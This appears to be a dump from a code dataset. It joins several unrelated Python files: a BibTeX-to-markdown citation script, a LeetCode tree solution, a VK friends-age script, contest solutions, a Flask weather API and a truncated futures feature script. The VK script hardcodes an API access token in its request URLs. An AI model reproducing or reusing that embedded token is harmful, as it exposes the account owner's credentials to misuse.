[editor['name'] for editor in ref['editor']]\n else:\n authors_list = ref['author']\n processed_authors_list = []\n for author in authors_list:\n a_name = author.split(',')\n a_name[0] = a_name[0].strip()\n a_name[1] = a_name[1].strip()\n processed_authors_list.append(a_name[1] + ' ' + a_name[0])\n if len(processed_authors_list) == 1:\n return processed_authors_list[0], None\n elif len(processed_authors_list) == 2:\n return processed_authors_list[0] + ' and ' + processed_authors_list[1], None\n elif len(processed_authors_list) >= 3:\n processed_authors_list[-1] = 'and ' + processed_authors_list[-1]\n return ', '.join(processed_authors_list), None\n\n def process_cite(self, ref):\n author = self.process_author(ref)[0]\n label = '[' + author + ', ' + ref['year'] + ']'\n citation = label + ' ' + self.process_citation(ref)[0]\n return label, citation\n\n def process_multicite(self, refs):\n labels = []\n citations = []\n for ref in refs:\n author = self.process_author(ref)[0]\n label = author + ', ' + ref['year']\n labels.append(label)\n citations.append('[' + label + '] ' + self.process_citation(ref)[0])\n multilabel = '[' + '; '.join(labels) + ']'\n multicitation = '\\n - '.join(citations)\n return multilabel, multicitation\n\n def process_booktitle(self, ref):\n return ref.get('booktitle', None), None\n\n def process_series(self, ref):\n return ref.get('series', None), None\n\n def process_month(self, ref):\n return ref.get('month', None), None\n\n def process_year(self, ref):\n return ref['year'], None\n\n def process_citation(self, ref):\n authors = self.process_authors(ref)[0]\n title = self.process_title(ref)[0]\n time = ref['year']\n if 'month' in ref:\n time = ref['month'] + ' ' + time\n\n if ref['ENTRYTYPE'].lower() == 'book':\n if 'subtitle' in ref:\n title = title + '. ' + ref['subtitle']\n citation = authors + '. *' + title + '*. '\n if 'publisher' in ref:\n citation = citation + ref['publisher'] + ', '\n\n elif 'thesis' in ref['ENTRYTYPE'].lower():\n citation = authors + '. *' + title + '*. '\n if ref['ENTRYTYPE'].lower() == 'phdthesis':\n citation = citation + 'PhD thesis, '\n elif ref['ENTRYTYPE'].lower() == 'mastersthesis':\n citation = citation + 'Masters thesis, '\n if 'school' in ref:\n citation = citation + ref['school'] + ', '\n\n elif ref['ENTRYTYPE'].lower() == 'inproceedings':\n citation = authors + '. ' + title + '. '\n citation = citation + 'In *' + ref['booktitle'] + '*, '\n if 'pages' in ref:\n citation = citation + 'pages ' + ref['pages'] + ', '\n\n elif ref['ENTRYTYPE'].lower() == 'article':\n citation = authors + '. ' + title + '. '\n citation = citation + '*' + ref['journal'] + '*, '\n if 'volume' in ref and 'number' in ref and 'pages' in ref:\n citation = citation + ref['volume'] + '(' + ref['number'] + '):' + ref['pages'] + ', '\n\n else:\n citation = authors + '. *' + title + '*. '\n\n citation = citation + time + '.'\n\n return citation, None\n\n def process_URL(self, ref):\n return ref.get('url', None), None\n\n def process_full(self, ref):\n authors = self.process_authors(ref)[0]\n title = self.process_title(ref)[0]\n time = ref['year']\n\n if 'month' in ref:\n time = ref['month'] + ' ' + time\n if ref['ENTRYTYPE'].lower() == 'book' and 'subtitle' in ref:\n title = title + '. ' + ref['subtitle'] + '.'\n\n citation = '**' + title + '**\\n *' + authors + '*\\n '\n if ref['ENTRYTYPE'].lower() == 'book':\n if 'publisher' in ref:\n citation = citation + ref['publisher'] + ', '\n elif 'thesis' in ref['ENTRYTYPE'].lower():\n if ref['ENTRYTYPE'].lower() == 'phdthesis':\n citation = citation + 'PhD thesis, '\n elif ref['ENTRYTYPE'].lower() == 'mastersthesis':\n citation = citation + 'Masters thesis, '\n if 'school' in ref:\n citation = citation + ref['school'] + ', '\n elif ref['ENTRYTYPE'].lower() == 'inproceedings':\n citation = citation + ref['booktitle'] + ', ' \n elif ref['ENTRYTYPE'].lower() == 'article':\n citation = citation + ref['journal'] + ', '\n citation = citation + time\n\n return citation, None \n\n\ndef main(args):\n infile = args.infile\n bibfile = args.bibfile\n outfile = args.outfile\n\n refsdict = load_bibtex(bibfile, customizer=customizations)\n\n # Read infile\n with open(infile, 'r') as inf:\n inputs = inf.read()\n\n # Process locations of replacement patterns\n matches = list(re.compile('\\[[\\s]*@\\w*:\\w*[\\s]*\\]').finditer(inputs))\n cites = list(re.compile('\\[[\\w\\s@:;]*@\\w*:cite[\\w\\s@:;]*\\]').finditer(inputs))\n\n # Generate replacement and append strings for each reference\n processor = Processor(refsdict)\n all_matches = []\n for match in matches:\n replace_str, append_str = processor.gen_replacement(match)\n all_matches.append((match, replace_str, append_str))\n for match in cites:\n replace_str, append_str = processor.gen_replacement(match, skip_types=['cite'])\n all_matches.append((match, replace_str, append_str)) # duplication from cites is fine due to skip_types\n\n # Sort all_matches according to start position of match\n all_matches = sorted(all_matches, key=lambda j_match: j_match[0].start())\n\n # Generate output string\n outputs = inputs\n offset = 0\n for j_match in all_matches:\n match = j_match[0] \n replace_str = j_match[1]\n replace_start = offset + match.start()\n if replace_str is not None:\n outputs = outputs[:replace_start] + outputs[replace_start:].replace(match.group(), replace_str, 1)\n offset += len(replace_str) - len(match.group())\n\n # Append references to output string\n appends = '\\n' if outputs.endswith('\\n') else '\\n\\n'\n appends = appends + '## References\\n'\n for j_match in all_matches:\n match = j_match[0]\n append_str = j_match[2]\n if append_str is not None:\n appends = appends + '\\n - ' + append_str\n outputs = outputs + appends\n\n # Write output to file\n with open(outfile, mode='w') as outf:\n outf.write(outputs)\n\n\nif __name__ == \"__main__\":\n arg_parser = argparse.ArgumentParser(\n description=\"Replace references in a markdown file with proper attributes from a bib file.\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n arg_parser.add_argument(\"infile\",\n help=\"Path to the input markdown file.\",\n type=str)\n arg_parser.add_argument(\"-b\", \"--bibfile\",\n help=\"Path to the BibTeX reference file.\",\n default=\"biblio.bib\",\n type=str)\n arg_parser.add_argument(\"-o\", \"--outfile\",\n help=\"Path for the output markdown file.\",\n default=\"result.md\",\n type=str)\n\n args = arg_parser.parse_args()\n main(args)\n","repo_name":"nitinkamra1992/MDwithBib","sub_path":"md_with_bib.py","file_name":"md_with_bib.py","file_ext":"py","file_size_in_byte":12199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16208448578","text":"# -*-coding:utf-8-*-\n\n\"\"\"\nQuestion:\n Invert Binary Tree\n\n Invert a binary tree.\n\n 4\n / \\\n 2 7\n / \\ / \\\n 1 3 6 9\n to\n 4\n / \\\n 7 2\n / \\ / \\\n 9 6 3 1\n\n Trivia:\n This problem was inspired by this original tweet by Max Howell:\n Google: 90% of our engineers use the software you wrote (Homebrew), but you can’t invert a binary tree on a whiteboard so fuck off.\n\nPerformance:\n 1. Total Accepted: 40077 Total Submissions: 101621 Difficulty: Easy\n 2. Your runtime beats 48.69% of python submissions.\n\"\"\"\n\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution(object):\n def invertTree(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: TreeNode\n \"\"\"\n if root is None:\n return\n root.left, root.right = root.right, root.left\n if root.left:\n self.invertTree(root.left)\n if root.right:\n self.invertTree(root.right)\n return root\n\n\nn1 = TreeNode(1)\nn2 = TreeNode(2)\nn3 = TreeNode(3)\nn4 = TreeNode(4)\nn6 = TreeNode(6)\nn7 = TreeNode(7)\nn9 = TreeNode(9)\nn4.left = n2\nn4.right = n7\nn2.left = n1\nn2.right = n3\nn7.left = n6\nn7.right = n9\n\nSolution().invertTree(n4)\nassert n4.left == n7\nassert n4.right == n2\nassert n7.left == n9\nassert n7.right == n6\nassert n2.left == n3\nassert n2.right == n1\n","repo_name":"dchentech/leetcode","sub_path":"226-invert-binary-tree.py","file_name":"226-invert-binary-tree.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28513947854","text":"import requests\nfrom collections import Counter\nfrom datetime import datetime\n\n\ndef calc_age(uid):\n \n #получение id пользователя по username или user_id:\n #например,для пользователя с именем reigning установлен id 150617534\n api_url = 'https://api.vk.com/method/users.get?v=5.71&access_token=08a2534208a2534208a253427208d42e2f008a208a25342688c552d8a26bc12eca467d6&user_ids='\n #user_name_id = input(\"Enter user ID or nickname: \")\n user_name_id = str(uid)\n r = requests.get(api_url + user_name_id)\n #print(r.text)\n\n #разбор json\n data_name = r.json()\n user_store = data_name['response'][0]\n user_id = str(user_store['id'])\n\n\n #получение списка друзей:\n api_url = 'https://api.vk.com/method/friends.get?v=5.71&access_token=08a2534208a2534208a253427208d42e2f008a208a25342688c552d8a26bc12eca467d6&user_id='\n r = requests.get(api_url + user_id + '&fields=bdate')\n\n #разбор json и наполнение списка с возрастом\n data = r.json()\n print(data)\n friend_list = data ['response']['items']\n age_list = []\n for item in friend_list:\n if 'bdate' in item:\n birthday = item['bdate'].split('.')\n if (len(birthday) == 3):\n birthyear_number = datetime.now().year - int(birthday[2])\n age_list.append(birthyear_number)\n\n #подсчет одинаковых значений и сортировка списка с возрастом \n c = Counter(age_list)\n print(c)\n m = c.items()\n print(m)\n my_list = list(m)\n print(my_list)\n my_list_sorted = sorted(my_list, key=lambda point: (-point[1], point[0])) \n return my_list_sorted\n\n\nif __name__ == '__main__':\n res = calc_age('reigning')\n print(res)\n","repo_name":"fimv/API_VK","sub_path":"friendsNNGU.py","file_name":"friendsNNGU.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23470988711","text":"N = int(10E6)\r\nyolo = [0] * N\r\n\r\ndef reverse(i):\r\n\treturn int(str(i)[::-1])\r\n\r\ndef presolve():\r\n\tfor i in xrange(1, N):\r\n\t\tr = reverse(i)\r\n\t\tif i % 10 == 0 or r >= i:\r\n\t\t\tyolo[i] = 1 + yolo[i - 1]\r\n\t\telse:\r\n\t\t\tyolo[i] = 1 + min(yolo[r], yolo[i - 1])\r\n\t\t\r\ndef solve(n):\r\n\treturn yolo[n]\r\n\r\npresolve();\r\nn = int(raw_input())\r\ni = 0\r\n\r\nwhile i < n:\r\n\ti += 1\r\n\tx = int(raw_input())\r\n\tprint('Case #{}: {}'.format(i, solve(x)))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_162/344.py","file_name":"344.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17796850662","text":"class Solution:\n def repeatedNTimes(self, A: List[int]) -> int:\n A.sort()\n n = len(A)\n count = 1\n for i in range(1, n):\n count = count + 1 if A[i] == A[i - 1] else 1\n if count == n / 2:\n return A[i]\n return A[-1]\n","repo_name":"AmitHasanShuvo/Programming","sub_path":"leetcode961again.py","file_name":"leetcode961again.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"24273848741","text":"from typing import ForwardRef, Generic, TypeVar\n\nT = TypeVar(\"T\")\n\nERR_TXT = \"return type hint not wrapped in Col[...]\"\n\n\nclass Col(Generic[T]):\n pass\n\n\ndef get_hint_col_type(rethint):\n assert is_type_hint_origin(rethint, Col), ERR_TXT\n arg = rethint.__args__[0]\n if isinstance(arg, ForwardRef):\n return arg.__forward_arg__\n return arg\n\n\ndef is_type_hint_origin(hint, cls):\n try:\n return hint.__origin__ is cls\n except AttributeError:\n return False\n\n\ndef get_return_hint(fun):\n ret_annotation = getattr(fun, \"__annotations__\", {}).get(\"return\")\n if ret_annotation is None:\n return None\n return get_hint_col_type(ret_annotation)\n","repo_name":"endremborza/colassigner","sub_path":"colassigner/type_hinting.py","file_name":"type_hinting.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18150451167","text":"import sys\nfrom collections import deque\nsys.stdin = open('input.txt', \"r\")\n'''\n용사는 1,1 에서 시작\n0 빈공간\n1 마법의 벽\n2 전설의 명검 그람\n'''\nY, X, T = map(int, sys.stdin.readline().rstrip().split(' '))\nboard = []\ncheckOne = [[0]*X for _ in range(Y)]\ncheckTwo = [[0]*X for _ in range(Y)]\nfor _ in range(Y):\n board.append(list(map(int, sys.stdin.readline().rstrip().split(' '))))\n\nqueue = deque([[0, 0, 0, False]])\ncheckOne[0][0] = 1\n\ndirection = [[1, 0], [-1, 0], [0, 1], [0, -1]]\nwhile queue:\n y, x, cnt, getSword = queue.popleft()\n\n for dx, dy in direction:\n ty = dy+y\n tx = dx+x\n\n # 범위 확인\n if 0 <= ty < Y and 0 <= tx < X:\n if ty == Y-1 and tx == X-1:\n print(cnt+1)\n exit()\n\n if cnt >= T:\n print('Fail')\n exit()\n\n # 칼 얻엇을경우\n if getSword and checkTwo[ty][tx] == 0:\n checkTwo[ty][tx] = 1\n queue.append([ty, tx, cnt+1, True])\n # 칼 없을경우\n else:\n\n if board[ty][tx] == 0 and checkOne[ty][tx] == 0:\n checkOne[ty][tx] = 1\n queue.append([ty, tx, cnt+1, False])\n elif board[ty][tx] == 2:\n checkOne[ty][tx] = 1\n queue.append([ty, tx, cnt+1, True])\n\nprint('Fail')\n","repo_name":"aver1001/Problem-Solving","sub_path":"풀이 완료/17836/acmicpc.py","file_name":"acmicpc.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42224358686","text":"from flask import Flask, jsonify\nimport numpy as np\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\n# create engine to hawaii.sqlite\nengine = create_engine(\"sqlite:///hawaii.sqlite\")\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n# Save references to each table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n# Create our session (link) from Python to the DB\nsession = Session(engine)\n\n#Flask Setup\napp = Flask(__name__)\n\n#Flask Routes\n\n@app.route(\"/\")\ndef welcome():\n return (\n \"Welcome to Home Page!
\"\n \"Available Routes:
\"\n \"/api/v1.0/precipitation
\"\n \"/api/v1.0/stations
\"\n \"/api/v1.0/tobs
\"\n \"/api/v1.0/start
\"\n \"/api/v1.0/start/end\"\n )\n@app.route(\"/api/v1.0/precipitation\")\ndef precip():\n precipitation = session.query(Measurement.date, Measurement.prcp).all()\n precip = {date: prcp for date, prcp in precipitation}\n return jsonify(precip)\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n stations = session.query(Station.station).all()\n stations_list = list(np.ravel(stations))\n return jsonify(stations_list)\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n temp = session.query(Measurement.date, Measurement.tobs).filter(Measurement.station == \"USC00519281\").all()\n temps = list(np.ravel(temp))\n return jsonify(temps)\n \n@app.route(\"/api/v1.0/\")\n@app.route(\"/api/v1.0//\")\ndef start_end(start = None, end = None):\n values = [func.min(Measurement.tobs), func.max(Measurement.tobs), func.avg(Measurement.tobs)]\n if not end:\n results = session.query(*values).filter(Measurement.date >= start).all()\n start_temp = list(np.ravel(results))\n return jsonify(start_temp)\n \n \n results = session.query(*values).filter(Measurement.date >= start).filter(Measurement.date <= end).all()\n start_temp = list(np.ravel(results))\n return jsonify(start_temp)\n\nif __name__ == \"__main__\":\n app.run(debug=True) ","repo_name":"J-Schea29/sqlalchemy-challenge","sub_path":"Api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41560751825","text":"import json\nfrom flask import Blueprint, render_template\nfrom database import db\n\ntest_page = Blueprint('test_page', __name__, template_folder='templates')\n\n@test_page.route('/test-mysql-dump', methods=['GET'])\ndef test_mysql_dump():\n with db.cursor() as cursor, open(\"sql/fetch_all_postal_codes_info.sql\", \"r\") as sql:\n cursor.execute(sql.read())\n data = cursor.fetchall()\n\n return render_template(\"test.html\", data=data)\n\n__all__ = [\"test_page\"]","repo_name":"kirti1211c/dbms","sub_path":"routes/test_page.py","file_name":"test_page.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29458188841","text":"# Exercise 1: Initial function, call with passed argument\nimport turtle\nbob = turtle.Turtle()\n\ndef square(t):\n \"\"\"Draws square iteratively, returns to origin\"\"\"\n for i in range(4):\n t.fd(200); t.lt(90)\n\nsquare(bob)\nturtle.resetscreen()\n\n# Exercise 2: Length added as parameter to square()\ndef square2(t, l):\n \"\"\"Draws square iteratively with length parameter, returns to origin\"\"\"\n for i in range(4):\n t.fd(l); t.lt(90)\n\nsquare2(bob,250)\nturtle.resetscreen()\n\n# Exercises 3-5 are examples of refactoring code\n\n# Exercise 3: Polygon\ndef polyline(t, n, l, ang):\n \"\"\"Text-given function to draw polygon shapes\"\"\"\n for i in range(n):\n t.fd(l); t.lt(ang)\n\ndef polygon(t,l,n):\n \"\"\"Draws n-sided polygon\"\"\"\n ang = 360.0 / n # \"360.0\" sets as float, avoids error codes\n polyline(t, n, l, ang)\n\npolygon(bob,l=200, n=3)\nturtle.resetscreen()\n\n# Exercise 4: Circle as polygon\nimport math\n\ndef circle(t, r):\n \"\"\"Draws circle by calling polygon()\"\"\"\n c = 2 * r * math.pi\n n = int(c / 3) + 3 # Instead of constant, define number of sides by circumference where +3 ensures n >= 3\n l = c / n\n polygon(t, l, n)\n\ndef circle2(t, r):\n \"\"\"Text-given alternate with refactoring\"\"\"\n arc(t, r, 360)\n\ncircle(bob, 50)\nturtle.resetscreen()\ncircle(bob, 100)\nturtle.resetscreen()\n\n# Exercise 5: Circle arc\ndef arc(t, r, ang):\n \"\"\"Draws complete circle if 360 degrees, partial otherwise\"\"\"\n arc_c = 2 * math.pi * r * ang / 360\n n = int(arc_c / 3) + 1\n a_l = arc_c / n\n a_ang = ang / n\n polyline(t, n, a_l, a_ang) # Rewritten with text-provided polyline.\n\narc(bob, 50, 180)\nturtle.mainloop()","repo_name":"mencohr/Computer-Science","sub_path":"Think Python/Chapter 4: Case study: interface design/Notes: Case study: Interface design/Note: Chapter 4.3-7: Exercises.py","file_name":"Note: Chapter 4.3-7: Exercises.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23148871972","text":"import sys\nfrom collections import deque\nimport copy\ndef main():\n N, M = map(int, input().split())\n H = [int(i) for i in input().split()]\n dp = [[] for i in range(N)]\n color = [0 for i in range(N)]\n for i in range(M):\n a, b = map(int, input().split())\n a -= 1\n b -= 1\n dp[a].append(b)\n dp[b].append(a)\n count = 0 \n for i in range(N):\n if color[i] == 1:\n continue\n flag = True\n for j in range(len(dp[i])):\n if H[i] <= H[dp[i][j]]:\n flag = False\n break\n else:\n color[dp[i][j]] = 1\n if flag:\n count += 1\n print(count)\n\nif __name__ == '__main__':\n main()\n","repo_name":"Tomoki-Kikuta/atcoder","sub_path":"abc166/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15321585168","text":"\"\"\"update user table\n\nRevision ID: 0a909e2b59a1\nRevises: 0b026dea7cc6\nCreate Date: 2019-11-25 10:15:20.875486\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '0a909e2b59a1'\ndown_revision = '0b026dea7cc6'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('usertable', sa.Column('site', sa.String(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('usertable', 'site')\n # ### end Alembic commands ###\n","repo_name":"petermirithu/Pitch_web_App","sub_path":"migrations/versions/0a909e2b59a1_update_user_table.py","file_name":"0a909e2b59a1_update_user_table.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2572257666","text":"\"\"\"9. Среди натуральных чисел, которые были введены, найти наибольшее по сумме цифр.\r\nВывести на экран это число и сумму его цифр.\"\"\"\r\n\r\n\r\nn = int(input('Введите значение (для завершения сравнения введите 0): '))\r\nmax_s = 0\r\nmax_m = 0\r\nwhile n != 0:\r\n m = n\r\n s = 0\r\n while n > 0:\r\n s += n % 10\r\n n //= 10\r\n if s > max_s:\r\n max_s = s\r\n max_m = m\r\n n = int(input('Введите значение (для завершения сравнения введите 0): '))\r\nprint('Число', max_m,'имеет наибольшую сумму цифр:', max_s)","repo_name":"SunshinePuff/Python_1","sub_path":"Lesson_2_9.py","file_name":"Lesson_2_9.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17660830749","text":"from machine import Pin, SoftI2C\nfrom lib.config import *\nfrom lib.oled.ssd1306 import SSD1306_I2C\nimport urequests\nimport json\n\n# Oled Display\ni2c = SoftI2C(sda=Pin(DEFAULT_IOTKIT_I2C_SDA), scl=Pin(DEFAULT_IOTKIT_I2C_SCL))\ndisplay = SSD1306_I2C(128, 64, i2c)\n\n###\n# Verbindung zum Cloud Dienst\n#\nreq = urequests.request(method='GET', url='http://api.sunrise-sunset.org/json?lat=47.3686498&lng=8.5391825')\n\n# Umwandlung nach JSON\nrc = req.text\ndata = json.loads( rc )\nresults = data['results']\nsr = str(results['sunrise'])\nss = str(results['sunset'])\n\ndisplay.text(\"Sunset \" + sr, 0, 0)\ndisplay.text(\"Sunrise \" + ss, 0, 8)\ndisplay.show()\n\nprint( sr, ss )","repo_name":"mc-b/iotkitmp","sub_path":"http/sunrise-sunset.py","file_name":"sunrise-sunset.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23632482741","text":"from .registry import MODELS\nfrom .stacked_hg import HourglassNet, Bottleneck2D\nfrom .refinenet_deformable import RefineNetDeform\nfrom .multi_task_head import MultitaskHead\n\n@MODELS.register(\"Hourglass\")\ndef build_hg(cfg):\n inplanes = cfg.MODEL.HGNETS.INPLANES\n num_feats = cfg.MODEL.OUT_FEATURE_CHANNELS//2\n depth = cfg.MODEL.HGNETS.DEPTH\n num_stacks = cfg.MODEL.HGNETS.NUM_STACKS\n num_blocks = cfg.MODEL.HGNETS.NUM_BLOCKS\n head_size = cfg.MODEL.HEAD_SIZE\n\n out_feature_channels = cfg.MODEL.OUT_FEATURE_CHANNELS\n\n\n num_class = sum(sum(head_size, []))\n model = HourglassNet(\n block=Bottleneck2D,\n inplanes = inplanes,\n num_feats= num_feats,\n depth=depth,\n head=lambda c_in, c_out: MultitaskHead(c_in, c_out, head_size=head_size),\n num_stacks = num_stacks,\n num_blocks = num_blocks,\n num_classes = num_class)\n\n model.out_feature_channels = out_feature_channels\n\n return model\n\n@MODELS.register(\"Refinenet\")\ndef build_rf(cfg):\n model = RefineNetDeform(\n 2, \n cuda=cfg.MODEL.CUDA, \n attn=cfg.MODEL.ATTN, \n attn_only=cfg.MODEL.ATTN_ONLY, \n attn_dim=cfg.MODEL.ATTN_DIM, \n n_head=cfg.MODEL.ATTN_N_HEAD, \n use_contrastive=cfg.MODEL.ATTN_USE_CTL,\n share_weights=cfg.MODEL.ATTN_SHARE_W, \n attn_bottleneck=cfg.MODEL.ATTN_BN, \n resoff=cfg.MODEL.RES_OFF, \n feature_dept=cfg.MODEL.RES_OFF_DEPT, \n tao=cfg.MODEL.CTL_TAO\n )\n model.out_feature_channels = 2\n return model\n\ndef build_backbone(cfg, type=None):\n assert cfg.MODEL.NAME in MODELS, \\\n \"cfg.MODELS.NAME: {} is not registered in registry\".format(cfg.MODELS.NAME)\n if type is None:\n return MODELS[cfg.MODEL.NAME](cfg)\n elif type == 'Refinenet':\n return MODELS[\"Refinenet\"](cfg)\n else:\n return MODELS[\"Hourglass\"](cfg)\n","repo_name":"c6wangya/hawp","sub_path":"parsing/backbones/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"13203121398","text":"import sys\nimport datetime as dt\nimport numpy as np\nimport pandas as pd\nimport skops.io as sio\n\n\ndef cal_features_and_return_one_day(m01: pd.DataFrame,\n instrument: str, contract: str, contract_multiplier: int,\n pre_settle: float, pre_spot_close: float,\n sub_win_width: int = 30, tot_bar_num: int = 240,\n amount_scale: float = 1e4, ret_scale: int = 100) -> pd.DataFrame:\n # basic price\n prev_day_close = m01[\"preclose\"].iloc[0]\n this_day_open = m01[\"daily_open\"].iloc[0]\n\n # aggregate variables\n agg_vars = [\"open\", \"high\", \"low\", \"close\", \"volume\", \"amount\"]\n agg_methods = {\n \"open\": \"first\",\n \"high\": max,\n \"low\": min,\n \"close\": \"last\",\n \"volume\": np.sum,\n \"amount\": np.sum,\n }\n dropna_cols = [\"open\", \"high\", \"low\", \"close\"]\n\n # intermediary variables\n m01[\"datetime\"] = m01[\"timestamp\"].map(dt.datetime.fromtimestamp)\n m01[\"vwap\"] = (m01[\"amount\"] / m01[\"volume\"] / contract_multiplier * amount_scale).fillna(method=\"ffill\")\n m01[\"vwap_cum\"] = (m01[\"amount\"].cumsum() / m01[\"volume\"].cumsum() / contract_multiplier * amount_scale).fillna(method=\"ffill\")\n m01[\"m01_return\"] = (m01[\"vwap\"] / m01[\"vwap\"].shift(1).fillna(pre_settle) - 1) * ret_scale\n m01[\"m01_return_cls\"] = (m01[\"close\"] / m01[\"close\"].shift(1).fillna(prev_day_close) - 1) * ret_scale\n m01[\"smart_idx\"] = m01[\"m01_return_cls\"].abs() / np.sqrt(m01[\"volume\"])\n m01[\"amplitude\"] = (m01[\"high\"] / m01[\"low\"] - 1) * ret_scale\n\n # agg to 5,10,15 minutes\n m05 = m01.set_index(\"datetime\")[agg_vars].resample(\"5T\").aggregate(agg_methods).dropna(axis=0, how=\"all\", subset=dropna_cols)\n m10 = m01.set_index(\"datetime\")[agg_vars].resample(\"10T\").aggregate(agg_methods).dropna(axis=0, how=\"all\", subset=dropna_cols)\n m15 = m01.set_index(\"datetime\")[agg_vars].resample(\"15T\").aggregate(agg_methods).dropna(axis=0, how=\"all\", subset=dropna_cols)\n for m_agg, m_agg_width in zip((m05, m10, m15), (5, 10, 15)):\n if len(m_agg) != tot_bar_num / m_agg_width:\n print(\"... data length is wrong! Length of M{:02d} is {} != {}\".format(\n m_agg_width, len(m_agg), tot_bar_num / m_agg_width))\n print(\"... contract = {}\".format(contract))\n print(\"... this program will terminate at once, please check again\")\n sys.exit()\n\n # initial results\n res = {\n \"instrument\": instrument,\n \"contract\": contract,\n \"tid\": {}, \"timestamp\": {},\n\n \"basis\": (pre_settle / pre_spot_close - 1) * ret_scale,\n \"csr\": (prev_day_close / pre_settle - 1) * ret_scale, # close and settle return\n \"onr\": (this_day_open / prev_day_close - 1) * ret_scale, # overnight return\n \"vwap_ret\": {}, \"vwap_cum_ret\": {}, \"hgh_ret\": {}, \"low_ret\": {}, # prices return\n \"vtop01_ret\": {}, \"vtop02_ret\": {}, \"vtop05_ret\": {}, # #top #diff #return\n \"vtop01_cvp\": {}, \"vtop02_cvp\": {}, \"vtop05_cvp\": {}, # corr(vwap, volume)\n \"vtop01_cvr\": {}, \"vtop02_cvr\": {}, \"vtop05_cvr\": {}, # corr(m01_return, volume)\n \"cvp\": {}, \"cvr\": {},\n \"up\": {}, \"dn\": {}, # chart\n \"skewness\": {}, # skewness\n \"smart01\": {}, \"smart01_ret\": {},\n \"smart02\": {}, \"smart02_ret\": {},\n \"smart05\": {}, \"smart05_ret\": {},\n \"vh01\": {}, \"vl01\": {}, \"vd01\": {},\n \"vh02\": {}, \"vl02\": {}, \"vd02\": {},\n \"vh05\": {}, \"vl05\": {}, \"vd05\": {},\n \"exr\": {}, \"exrb01\": {},\n \"gu\": {}, \"gd\": {}, \"g_tau\": {}, \"g_tau_abs\": {},\n \"mtm_vol_adj\": {},\n\n \"rtm\": {},\n }\n\n # core loop\n sub_win_num = int(tot_bar_num / sub_win_width)\n this_day_end_vwap = m01[\"vwap\"].iloc[-1]\n for t in range(1, sub_win_num):\n bar_num_before_t = t * sub_win_width\n norm_scale = np.sqrt(bar_num_before_t)\n m01_before_t = m01.iloc[0:bar_num_before_t, :]\n top01_bars = int(0.1 * bar_num_before_t)\n top02_bars = int(0.2 * bar_num_before_t)\n top05_bars = int(0.5 * bar_num_before_t)\n next_vwap, ts = m01.at[bar_num_before_t, \"vwap\"], m01.at[bar_num_before_t, \"timestamp\"]\n\n res[\"tid\"][t], res[\"timestamp\"][t] = \"T{:02d}\".format(t), ts\n\n # --- --- --- --- ---\n # --- return to mature\n res[\"rtm\"][t] = (this_day_end_vwap / next_vwap - 1) * ret_scale\n\n # --- --- --- --- ---\n # --- new alphas\n # kyzq: smart money\n sorted_by_smart_idx = m01_before_t[[\"vwap\", \"vwap_cum\", \"volume\", \"amount\", \"smart_idx\", \"m01_return_cls\"]].sort_values(by=\"smart_idx\", ascending=False)\n for threshold_prop in [0.1, 0.2, 0.5]:\n _id = \"{:02d}\".format(int(10 * threshold_prop))\n volume_threshold = sorted_by_smart_idx[\"volume\"].sum() * threshold_prop\n n = sum(sorted_by_smart_idx[\"volume\"].cumsum() < volume_threshold) + 1\n smart_df = sorted_by_smart_idx.head(n)\n smart_vwap = smart_df[\"vwap\"] @ smart_df[\"amount\"] / 